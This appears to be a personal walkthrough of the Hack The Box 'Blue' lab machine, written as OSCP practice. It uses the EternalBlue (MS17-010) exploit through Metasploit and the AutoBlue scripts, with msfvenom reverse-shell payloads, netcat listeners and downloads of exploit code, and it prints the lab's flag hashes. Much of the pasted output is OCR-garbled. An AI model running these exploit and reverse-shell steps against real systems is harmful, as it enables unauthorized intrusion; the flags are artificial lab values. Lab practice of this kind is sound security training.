This my attempt to create a walk through on HTB’s Blue:

JOURNEY TO OSCP Blue I 1 I LUD Difficulty : Points: Release Windows Easy 20 28 Jul 2917 10.1€.1€-4€

 

 

Autorecon:

 

 

 

 

Autorecon-445:

 

Looking at the ports that were scanned ports 135, 139 didn’t turn up anything valuable to look at.

 

But Port 445 has a lot of information and gives a possible vulnerability to look at:

 

# Nmap 7.70 scan initiated Sun Apr 11 11:55:27 2021 as: nmap -vv -script=banner, (nbstat or smb* or ssl*) an -- reason -Pn -sv -p 445 d not (brute or broadcast or dos or external or fuzzer) -script-args=unsafe=l -ON / root/ Tools/AutoRecon/src/autorecon/results/10.10 .10.40/ scans/tcp 445 smb nmap.txt -ox / root/ Tools/AutoRecon/src/autorecon/results/10.10.10.40/scans/xml/tcp 445 smb nmap.xml 10.10.1 0.40 Nmap scan report for 10.10.10.40 Host is up, received user-set (0.13s latency) . Scanned at 2021-04-11 EDT for 120s PORT STATE SERVICE REASON VERSION 445/tcp open microsoft-ds syn-ack ttl 127 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: I smb-enum-shares: account used: guest Type: STYPE DISKTREE HIDDEN Comment: Remote Admin Anonymous access: <none> Current user access: <none> Type: STYPE DISKTREE HIDDEN Comment: Default share Anonymous access: <none> Current user access: <none> WORKGROUP)

 

smb . 40\1PC$: Type: STYPE IPC HIDDEN Comment: Remote IPC Anonymous access: READ Current user access: READ/WRITE 10.10.10.40\Share: Type: STYPE DISKTREE Comment : Anonymous access: <none> Current user access: READ Type: STYPE DISKTREE Comment : Anonymous access: <none> Current user access: READ -Is: Volume 10.10.10.40\Share

 

SIZE Volume SIZE TIME 2017-07 2017-07 TIME -14 09 : 48 : 44 -14 09 : 48 : 44 10.40\Users 2009-07-13 2009-07-13 2009-07-13 23 •20. 2009-07-13 23 •20. 2009-07-13 23 •20. 2009-07-13 23 •20. 2009-07-13 23 •20. 2011-04-12 03:51. •29 2009-07-13 23 •20. smb-mbenum: Master Browser HARIS-PC 6.1 Potential Browser HARIS-PC 6.1 Server service FILENAME FILENAME Public Public\Documents Public\Downloads Public\Music Public\Pictures Public\Recorded TV Public\Videos BUFF 10.0 HARIS-PC 6.1 Windows NT/2000/XP/2003 server BUFF HARIS -PC Wo rkstation BUFF HARIS -PC 10.0 6.1 10.0 6.1

 

 

smb2-capabilities : 2.02: Distributed File System 2.10: Distributed File System Leasing Multi-credit operations smb2-security-mode: 2.02: Message signing enabled but not required smb2-time: date: 2021-04-11 start date: 2021-04-11

 

So we see “ms17-010” looks to be a vulnerability which is “eternalblue”

 

Let’s try metasploit and see what happens

 

Metasploit:

 

msf msf ms f > use exploit/windows/smb/ms17 010 eternalblue exploit(windows/smb/ms17 010 eternalbtue) > show optoins Invalid parameter "optoins" , use "show -h" for more information exploit(windows/smb/ms17 010 eternalbtue) > show options Module options (exploit/windows/smb/ms17 010 eternalblue) : Name GroomAllocations GroomDelta MaxExploitAttempts ProcessName RHOST RPORT SMBDomain smapass SMBlJser VerifyArch VerifyTarget Exploit target: Current 12 5 3 spoolsv . exe 445 true true Setting Required Description yes yes yes yes yes yes yes yes Id O Name Windows 7 and Server 2008 Initial number of times to groom the kernel pool. The amount to increase the groom count by per try. The number of times to retry the exploit. Process to inject payload into. The target address The target port (TCP) (Optional) The Windows domain to use for authentication (Optional) The password for the specified username (Optional) The username to authenticate as Check if remote architecture matches exploit Target. Check if remote OS matches exploit Target. Service Packs msf exploit (windows/smb/ms17 Unost 10.10. 14.19 msf exploit (windows/smb/ms17 rhost 10.10. 10.40 msf exploit(windows/smb/ms17 010 010 010 R2 (x64) All eternalblue) eternalblue) eternalblue) > > > set Unost 10.10. 14.19 set rhost 10.10. 10.40 exploit

 

Looks like “Eternalblue” worked on metasploit and it looks like were in:

Started reverse 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 10.10 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 .10.40:445 TCP handler on 10.10.14.19:4444 Connecting to target for exploitation. Connection established for exploitation. Target OS selected valid for OS indicated by SMB reply CORE raw buffer dump (42 bytes) OXOOOOOOOO 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 profes oxoooooolo 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 serv 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 Target arch selected valid for arch indicated by DCE/RPC reply Trying exploit with 12 Groom Allocations. Sending all but last fragment of exploit packet Starting non-paged pool grooming Sending SMBv2 buffers Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. Sending final SMBv2 buffers. Sending last fragment of exploit packet! Receiving response from exploit packet ETERNALBLUE overwrite completed successfully (OXCOOOOOOD) ! Sending egg to corrupted connection. Triggering free of corrupted buffer. command shell session 1 opened (10.10.14.19:4444 10.10.10.40:49158) at 2021-04-11 12:42:42 10.10.10.40:445 10.10.10.40:445 10.10.10.40:445 whoami whoami nt authority\system C: \Windows\system32> -0400

 

 

Privilege Escalation:

 

User Flag:

 

 

Now that we’re in I want to see if I can find the user flag:

 

C : \Windows\system32>cd cd / dir Volume in drive C has no label. Volume Serial Number is AOEF-1911 04 : 20 03:23 17:58 14:48 07:56 11:42 07:56 07:56 07:56 14:45 08:51 Directory 14/07/2009 24/12/2017 14/07/2017 14/07/2017 21/07/2017 15/01/2021 of C: \ O File(s) perfLogs Program Files Program Files Share Users Windows O bytes (X86) 6 Dir(s) bytes free C: Users cd Users dir Volume in drive C has no label. Volume Serial Number is AOEF-1911 Directory 21/07/2017 21/07/2017 21/07/2017 14/07/2017 12/04/2011 of O File(s) Administrator haris Public O bytes 5 Dir(s) bytes free haris cd haris

 

Looks like I found the user flag.

 

dir Volume in drive C has no label. Volume Serial Number is AOEF-1911 14:45 14:45 08:58 03:23 08:58 08:58 08:58 08:58 08:58 08:58 08:58 08:58 08:58 Directory 14/07/2017 14/07/2017 15/07/2017 24/12/2017 15/07/2017 15/07/2017 15/07/2017 15/07/2017 15/07/2017 15/07/2017 15/07/2017 15/07/2017 15/07/2017 of O File(s) Contacts Desktop Documents Downloads Favorites Links Music Pictures Saved Games Searches Videos O bytes 13 Dir(s) bytes free Desktop cd Desktop dir Volume in drive C has no label. Volume Serial Number is AOEF-1911 Directory 24/12/2017 24/12/2017 21/07/2017 of 03:23 03:23 07 : 54 1 File(s) 32 user. txt 32 bytes 2 Dir(s) bytes free C:\Users\haris\Desktop>type user. txt type user. txt 4c546aea7dbee75cbd71de245c8deea9

 

Root Flag:

 

Now I want to see if I can find the root flag,

 

Going a few directories I think I saw an Administrator Direcotry:

 

And Yes, sure enough there is an “Administrator’s direcory”

 

cd .. / dir Volume in drive C has no label. Volume Serial Number is AOEF-1911 07:56 07:56 07:56 14:45 08:51 Directory 21/07/2017 21/07/2017 21/07/2017 14/07/2017 12/04/2011 of O File(s) Administrator haris Public O bytes 5 Dir(s) bytes free

 

Administrator cd Administrator dir Volume in drive C has no label. Volume Serial Number is AOEF-1911 07:56 07:56 07:56 03:22 07:56 13:05 07:56 07:56 07:56 07:56 07:56 07:56 07:56 Directory 21/07/2017 21/07/2017 21/07/2017 24/12/2017 21/07/2017 15/01/2021 21/07/2017 21/07/2017 21/07/2017 21/07/2017 21/07/2017 21/07/2017 21/07/2017 of C:\Users\Administrator O File(s) Contacts Desktop Documents Downloads Favorites Links Music Pictures Saved Games Searches Videos O bytes 13 Dir(s) bytes free C:\Users\Administrator>cd Desktop cd Desktop dir Volume in drive C has no label. Volume Serial Number is AOEF-1911 Directory 24/12/2017 24/12/2017 21/07/2017 of C:\Users\Administrator\Desktop 03:22 03:22 07:57 1 File(s) 32 root. txt 32 bytes 2 Dir(s) bytes free C:\Users\Administrator\Desktop>type root. txt type root. txt ff548eb71e920ff6c08843ce9df4e717

 

Exploit EternalBlue Mannually:

Since I’m practicing for the OSCP, I need to learn how to exploit machines without always having Metasploit avaliable.

 

I found this script:

https://github.com/3ndG4me/AutoBlue-MS17-010

 

 

Check if the target is vulnerable (assuming I didn’t have autorecon)

 

python eternal_checker.py <target ip>:

 

Create a shell:

 

cd shellcode

 

./shell_prep.sh

 

 

Start a listener:

 

nc -lvp 4444

 

nc -lvp 5555

 

root@kali : -/T001s/10.10.10.40/AutoB1ue-MS17 listening on [any] 4444 -010/ shellcode# nc -l vp 4444 t@kali: ools/10.10.10.40/AutoBlue-MS17-010/shellcode 205x2 root@kati listening -Ivp 5555 on [any] 5555

 

Let’s exploit, from /shellcode back to /AutoBlue-MS17–010/shellcode

 

I will use eternalblue_exploit7.py:

 

python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin

 

It failed no shell in my listener:

 

I’m going to try to create a new shell since this is one is failing.

 

cd shellcode

rm sc*

Ls

 

root@kati :-/TOOIS/IO .10 .10 .40/Aut0B1ue-MS17 root@kati :-/TOOIS/IO .10 .10 .40/Aut0B1ue-MS17 eternalblue kshellcode x64 . asm eternalblue root@kati :-/TOOIS/IO .10 .10 .40/Aut0B1ue-MS17 -010/sheUcode# rm -010/sheUcode# Is kshellcode x86. asm eternalblue sc merge. py -010/sheUcode# shell _ prep . sh

 

Create the new shell:

 

cd shellcode

 

./shell_prep.sh

 

• :-/TOOIS/IO .10 .10.40/Aut0B1ue-MS17-010/sheUcode# root@kall Eternal Blue Windows Shellcode Compiler Let's compile them windoos shellcodezzz Compiling x64 kernel shellcode Compiling x86 kernel shellcode ./shell prep.sh kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? LHOST for reverse connection: (Y/n) 10.10. 14.19 LPORT you want x64 8888 LPORT you want x86 9999 Type O to generate Type O to generate Generating x64 cmd to listen on: to listen on: a meterpreter shell or 1 to generate a regular cmd shell a staged payload or 1 to generate a stageless payload shell (stageless)... msfvenom -p windows/x64/shell reverse tcp -f raw -o sc x64 msf .bin EXITFUNC=thread LHOST=IO. 10. 14.19 LPORT=8888 [-] No platform was selected, choosing Msf: :Module: :Platform: :Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Saved as: sc x64 msf.bin Generating x86 cmd shell (stageless) msfvenom -p windows/shell reverse tcp -f raw -o sc x86 msf .bin EXITFUNC=thread LHOST=IO. 10. 14.19 LPORT=9999 [-] No platform was selected, choosing Msf: :Module: :Platform: :Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Saved as: sc x86 msf.bin MERGING SHELLCODE WOOOO! DONE

 

Start new listeners:

 

root@kali : -/T001s/10.10.10.40/AutoB1ue-MS17 listening on [any] 8888 -010/ shellcode# nc -Ivp 8888 root@kali: -n001s/10.10.10.40/AutoBlue-MS17-010/shellcode 205x26 -Ivp 9999 listening on [any] 9999

 

Okay, so I ran the shell twice, I’m going to try to find a different exploit

 

 

 

New Exploit:

 

Using searchsploit:

 

Searchsploit –id MS17-10:

root@kali:-/Tools/10.10.10.40# searchsploit MS17-010 Exploit Title Microsoft Windows Microsoft Windows Microsoft Windows Microsoft Windows Microsoft Windows Microsoft Windows Eternal Synergy' V EternalChampionI SMB Remote Code Ex - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) Server 2008 R2 (x64) 'Srv0s2FeaToNtI SMB Remote Code Execution (MS17-0 Windows 7/2008 R2 (x64) 'Eternal Blue' SMB Remote Code Execution (MS17- Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'Eternal Blue' SMB Remote Code Ex Windows 8/8.1/2012 R2 (x64) Eternal Blue' SMB Remote Code Execution (M EDB-ID 43970 41891 41987 42031 42315 42030 Shell codes: No Result

 

I’m working with Windows 7 so we’ll use exploit # 42315. Clone the exploit into the working directory.

 

searchsploit -m 42315

 

After looking at the source code, I need to do three things:

  1. Download mysmb.py since the exploit imports it. The download location is included in the exploit.
  2. Use MSFvenom to create a reverse shell payload (allowed on the OSCP as long as you’re not using meterpreter).
  3. Make changes in the exploit to add the authentication credentials and the reverse shell payload.

First, download the file and rename it to mysmb.py

 

wget https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/42315.py

mv 42315.py.1 mysmb.py